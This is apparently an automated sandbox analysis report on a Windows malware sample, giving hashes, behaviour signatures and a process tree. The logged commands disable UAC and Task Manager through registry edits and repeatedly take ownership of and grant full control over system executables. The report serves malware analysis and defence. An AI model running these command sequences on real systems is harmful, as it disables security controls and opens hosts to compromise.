Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-10-2024 06:10

General

  • Target

    e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe

  • Size

    550KB

  • MD5

    ef66bc948ca5ff1bd4e76191adc11b0a

  • SHA1

    d1fb64af325b0cfaa165869d8fcafea672849fd3

  • SHA256

    e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25

  • SHA512

    914de2b160d607dfb87c19e52006c4c3724f8d96f7a7ae7d31d1219539745fc73a77e2484cc23459f33b16ee16f8356356380f759988e15dddbe5fd707b905d8

  • SSDEEP

    6144:/pW2bgbbV28okoS1oWMkdlZQ5iinNrv26FYLIcw/3Scg1IReqYKztp0YcAvq:/pW2IoioS6p8IReqYKztp0YTvq

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Disables Task Manager via registry modification
  • Possible privilege escalation attempt 64 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 64 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 10 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe
    "C:\Users\Admin\AppData\Local\Temp\e6b8e3e3afe5b8a273176c7538102f7a6e7bdb72879393e9b398220b075afc25.exe"
    1⤵
    • Checks computer location settings
    • Modifies system executable filetype association
    • Drops file in System32 directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1112
    • C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      2⤵
      • UAC bypass
      • Modifies registry key
      PID:1224
    • C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      2⤵
      • Modifies registry key
      PID:1764
    • C:\Windows\System32\takeown.exe
      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\bfsvc.exe"
      2⤵
      • Modifies file permissions
      • Suspicious use of AdjustPrivilegeToken
      PID:1664
    • C:\Windows\System32\icacls.exe
      "C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)
      2⤵
        PID:3656
      • C:\Windows\System32\takeown.exe
        "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\HelpPane.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:532
      • C:\Windows\System32\icacls.exe
        "C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)
        2⤵
          PID:3136
        • C:\Windows\System32\takeown.exe
          "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\hh.exe"
          2⤵
          • Possible privilege escalation attempt
          • Suspicious use of AdjustPrivilegeToken
          PID:4068
        • C:\Windows\System32\icacls.exe
          "C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)
          2⤵
            PID:2496
          • C:\Windows\System32\takeown.exe
            "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\splwow64.exe"
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1104
          • C:\Windows\System32\icacls.exe
            "C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)
            2⤵
              PID:1956
            • C:\Windows\System32\takeown.exe
              "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\winhlp32.exe"
              2⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4212
            • C:\Windows\System32\icacls.exe
              "C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)
              2⤵
                PID:804
              • C:\Windows\System32\takeown.exe
                "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\write.exe"
                2⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4864
              • C:\Windows\System32\icacls.exe
                "C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                2⤵
                  PID:1108
                • C:\Windows\System32\takeown.exe
                  "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\raserver.exe"
                  2⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1184
                • C:\Windows\System32\icacls.exe
                  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                  2⤵
                  • Modifies file permissions
                  PID:2300
                • C:\Windows\System32\takeown.exe
                  "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\msra.exe"
                  2⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3432
                • C:\Windows\System32\icacls.exe
                  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                  2⤵
                    PID:3396
                  • C:\Windows\System32\takeown.exe
                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"
                    2⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:440
                  • C:\Windows\System32\icacls.exe
                    "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                    2⤵
                      PID:4520
                    • C:\Windows\System32\takeown.exe
                      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"
                      2⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1352
                    • C:\Windows\System32\icacls.exe
                      "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                      2⤵
                      • Possible privilege escalation attempt
                      • Modifies file permissions
                      PID:3960
                    • C:\Windows\System32\takeown.exe
                      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"
                      2⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:32
                    • C:\Windows\System32\icacls.exe
                      "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                      2⤵
                        PID:1248
                      • C:\Windows\System32\takeown.exe
                        "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\logagent.exe"
                        2⤵
                        • Possible privilege escalation attempt
                        • Suspicious use of AdjustPrivilegeToken
                        PID:548
                      • C:\Windows\System32\icacls.exe
                        "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                        2⤵
                          PID:3448
                        • C:\Windows\System32\takeown.exe
                          "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"
                          2⤵
                          • Modifies file permissions
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4736
                        • C:\Windows\System32\icacls.exe
                          "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                          2⤵
                            PID:3876
                          • C:\Windows\System32\takeown.exe
                            "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"
                            2⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4492
                          • C:\Windows\System32\icacls.exe
                            "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                            2⤵
                            • Modifies file permissions
                            PID:4948
                          • C:\Windows\System32\takeown.exe
                            "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"
                            2⤵
                            • Possible privilege escalation attempt
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2572
                          • C:\Windows\System32\icacls.exe
                            "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                            2⤵
                              PID:1988
                            • C:\Windows\System32\takeown.exe
                              "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"
                              2⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4712
                            • C:\Windows\System32\icacls.exe
                              "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                              2⤵
                                PID:4724
                              • C:\Windows\System32\takeown.exe
                                "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"
                                2⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1480
                              • C:\Windows\System32\icacls.exe
                                "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                2⤵
                                  PID:3992
                                • C:\Windows\System32\takeown.exe
                                  "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\runas.exe"
                                  2⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3112
                                • C:\Windows\System32\icacls.exe
                                  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                  2⤵
                                  • Possible privilege escalation attempt
                                  PID:3340
                                • C:\Windows\System32\takeown.exe
                                  "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"
                                  2⤵
                                  • Modifies file permissions
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2956
                                • C:\Windows\System32\icacls.exe
                                  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                  2⤵
                                    PID:4504
                                  • C:\Windows\System32\takeown.exe
                                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"
                                    2⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2084
                                  • C:\Windows\System32\icacls.exe
                                    "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                    2⤵
                                      PID:2784
                                    • C:\Windows\System32\takeown.exe
                                      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                      2⤵
                                      • Modifies file permissions
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3708
                                    • C:\Windows\System32\icacls.exe
                                      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                      2⤵
                                      • Possible privilege escalation attempt
                                      PID:2280
                                    • C:\Windows\System32\takeown.exe
                                      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                      2⤵
                                      • Possible privilege escalation attempt
                                      PID:2056
                                    • C:\Windows\System32\icacls.exe
                                      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                      2⤵
                                        PID:1260
                                      • C:\Windows\System32\takeown.exe
                                        "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                        2⤵
                                          PID:4060
                                        • C:\Windows\System32\icacls.exe
                                          "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                          2⤵
                                          • Possible privilege escalation attempt
                                          PID:1556
                                        • C:\Windows\System32\takeown.exe
                                          "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                          2⤵
                                            PID:60
                                          • C:\Windows\System32\icacls.exe
                                            "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                            2⤵
                                            • Possible privilege escalation attempt
                                            PID:5092
                                          • C:\Windows\System32\takeown.exe
                                            "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                            2⤵
                                              PID:1280
                                            • C:\Windows\System32\icacls.exe
                                              "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                              2⤵
                                                PID:1348
                                              • C:\Windows\System32\takeown.exe
                                                "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                2⤵
                                                  PID:4468
                                                • C:\Windows\System32\icacls.exe
                                                  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                  2⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:3292
                                                • C:\Windows\System32\takeown.exe
                                                  "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                  2⤵
                                                  • Modifies file permissions
                                                  PID:3120
                                                • C:\Windows\System32\icacls.exe
                                                  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                  2⤵
                                                    PID:4988
                                                  • C:\Windows\System32\takeown.exe
                                                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                    2⤵
                                                    • Modifies file permissions
                                                    PID:1736
                                                  • C:\Windows\System32\icacls.exe
                                                    "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                    2⤵
                                                      PID:512
                                                    • C:\Windows\System32\takeown.exe
                                                      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                      2⤵
                                                        PID:2004
                                                      • C:\Windows\System32\icacls.exe
                                                        "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                        2⤵
                                                          PID:3892
                                                        • C:\Windows\System32\takeown.exe
                                                          "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                          2⤵
                                                          • Possible privilege escalation attempt
                                                          PID:3644
                                                        • C:\Windows\System32\icacls.exe
                                                          "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                          2⤵
                                                          • Possible privilege escalation attempt
                                                          • Modifies file permissions
                                                          PID:4608
                                                        • C:\Windows\System32\takeown.exe
                                                          "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                          2⤵
                                                          • Possible privilege escalation attempt
                                                          • Modifies file permissions
                                                          PID:3156
                                                        • C:\Windows\System32\icacls.exe
                                                          "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                          2⤵
                                                          • Modifies file permissions
                                                          PID:2808
                                                        • C:\Windows\System32\takeown.exe
                                                          "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                          2⤵
                                                            PID:1132
                                                          • C:\Windows\System32\icacls.exe
                                                            "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                            2⤵
                                                              PID:1012
                                                            • C:\Windows\System32\takeown.exe
                                                              "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                              2⤵
                                                              • Modifies file permissions
                                                              PID:1948
                                                            • C:\Windows\System32\icacls.exe
                                                              "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                              2⤵
                                                                PID:4512
                                                              • C:\Windows\System32\takeown.exe
                                                                "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                2⤵
                                                                • Modifies file permissions
                                                                PID:744
                                                              • C:\Windows\System32\icacls.exe
                                                                "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                2⤵
                                                                  PID:2696
                                                                • C:\Windows\System32\takeown.exe
                                                                  "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                  2⤵
                                                                  • Modifies file permissions
                                                                  PID:2056
                                                                • C:\Windows\System32\icacls.exe
                                                                  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                  2⤵
                                                                    PID:4792
                                                                  • C:\Windows\System32\takeown.exe
                                                                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                    2⤵
                                                                      PID:3200
                                                                    • C:\Windows\System32\icacls.exe
                                                                      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                      2⤵
                                                                        PID:3984
                                                                      • C:\Windows\System32\takeown.exe
                                                                        "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                        2⤵
                                                                          PID:3204
                                                                        • C:\Windows\System32\icacls.exe
                                                                          "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                          2⤵
                                                                          • Modifies file permissions
                                                                          PID:1556
                                                                        • C:\Windows\System32\takeown.exe
                                                                          "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                          2⤵
                                                                          • Modifies file permissions
                                                                          PID:4276
                                                                        • C:\Windows\System32\icacls.exe
                                                                          "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                          2⤵
                                                                            PID:3624
                                                                          • C:\Windows\System32\takeown.exe
                                                                            "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                            2⤵
                                                                            • Possible privilege escalation attempt
                                                                            PID:840
                                                                          • C:\Windows\System32\icacls.exe
                                                                            "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                            2⤵
                                                                              PID:4640
                                                                            • C:\Windows\System32\takeown.exe
                                                                              "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                              2⤵
                                                                              • Possible privilege escalation attempt
                                                                              PID:3812
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                3⤵
                                                                                  PID:1280
                                                                              • C:\Windows\System32\icacls.exe
                                                                                "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                2⤵
                                                                                  PID:1432
                                                                                • C:\Windows\System32\takeown.exe
                                                                                  "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                  2⤵
                                                                                  • Possible privilege escalation attempt
                                                                                  • Modifies file permissions
                                                                                  PID:3360
                                                                                • C:\Windows\System32\icacls.exe
                                                                                  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                  2⤵
                                                                                  • Modifies file permissions
                                                                                  PID:208
                                                                                • C:\Windows\System32\takeown.exe
                                                                                  "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                  2⤵
                                                                                    PID:3236
                                                                                  • C:\Windows\System32\icacls.exe
                                                                                    "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                    2⤵
                                                                                    • Possible privilege escalation attempt
                                                                                    PID:3760
                                                                                  • C:\Windows\System32\takeown.exe
                                                                                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                    2⤵
                                                                                    • Modifies file permissions
                                                                                    PID:4232
                                                                                  • C:\Windows\System32\icacls.exe
                                                                                    "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                    2⤵
                                                                                    • Possible privilege escalation attempt
                                                                                    PID:3824
                                                                                  • C:\Windows\System32\takeown.exe
                                                                                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                    2⤵
                                                                                      PID:5092
                                                                                    • C:\Windows\System32\icacls.exe
                                                                                      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                      2⤵
                                                                                      • Modifies file permissions
                                                                                      PID:904
                                                                                    • C:\Windows\System32\takeown.exe
                                                                                      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                      2⤵
                                                                                      • Modifies file permissions
                                                                                      PID:3540
                                                                                    • C:\Windows\System32\icacls.exe
                                                                                      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                      2⤵
                                                                                      • Possible privilege escalation attempt
                                                                                      • Modifies file permissions
                                                                                      PID:1608
                                                                                    • C:\Windows\System32\takeown.exe
                                                                                      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                      2⤵
                                                                                        PID:3536
                                                                                      • C:\Windows\System32\icacls.exe
                                                                                        "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                        2⤵
                                                                                          PID:4240
                                                                                        • C:\Windows\System32\takeown.exe
                                                                                          "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                          2⤵
                                                                                            PID:5212
                                                                                          • C:\Windows\System32\icacls.exe
                                                                                            "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                            2⤵
                                                                                            • Possible privilege escalation attempt
                                                                                            PID:5260
                                                                                          • C:\Windows\System32\takeown.exe
                                                                                            "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                            2⤵
                                                                                            • Possible privilege escalation attempt
                                                                                            PID:5300
                                                                                          • C:\Windows\System32\icacls.exe
                                                                                            "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                            2⤵
                                                                                            • Possible privilege escalation attempt
                                                                                            PID:5380
                                                                                          • C:\Windows\System32\takeown.exe
                                                                                            "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                            2⤵
                                                                                            • Possible privilege escalation attempt
                                                                                            PID:5444
                                                                                          • C:\Windows\System32\icacls.exe
                                                                                            "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                            2⤵
                                                                                              PID:5476
                                                                                            • C:\Windows\System32\takeown.exe
                                                                                              "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                              2⤵
                                                                                                PID:5524
                                                                                              • C:\Windows\System32\icacls.exe
                                                                                                "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                2⤵
                                                                                                  PID:5588
                                                                                                • C:\Windows\System32\takeown.exe
                                                                                                  "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                  2⤵
                                                                                                  • Possible privilege escalation attempt
                                                                                                  PID:5632
                                                                                                • C:\Windows\System32\icacls.exe
                                                                                                  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                  2⤵
                                                                                                  • Modifies file permissions
                                                                                                  PID:5660
                                                                                                • C:\Windows\System32\takeown.exe
                                                                                                  "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                  2⤵
                                                                                                  • Possible privilege escalation attempt
                                                                                                  • Modifies file permissions
                                                                                                  PID:5712
                                                                                                • C:\Windows\System32\icacls.exe
                                                                                                  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                  2⤵
                                                                                                    PID:5724
                                                                                                  • C:\Windows\System32\takeown.exe
                                                                                                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                    2⤵
                                                                                                    • Modifies file permissions
                                                                                                    PID:5792
                                                                                                  • C:\Windows\System32\icacls.exe
                                                                                                    "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                    2⤵
                                                                                                    • Possible privilege escalation attempt
                                                                                                    • Modifies file permissions
                                                                                                    PID:5816
                                                                                                  • C:\Windows\System32\takeown.exe
                                                                                                    "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                    2⤵
                                                                                                      PID:5884
                                                                                                    • C:\Windows\System32\icacls.exe
                                                                                                      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                      2⤵
                                                                                                        PID:5904
                                                                                                      • C:\Windows\System32\takeown.exe
                                                                                                        "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                        2⤵
                                                                                                        • Modifies file permissions
                                                                                                        PID:5920
                                                                                                      • C:\Windows\System32\icacls.exe
                                                                                                        "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                        2⤵
                                                                                                          PID:5972
                                                                                                        • C:\Windows\System32\takeown.exe
                                                                                                          "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                          2⤵
                                                                                                            PID:5980
                                                                                                          • C:\Windows\System32\icacls.exe
                                                                                                            "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                            2⤵
                                                                                                            • Modifies file permissions
                                                                                                            PID:5996
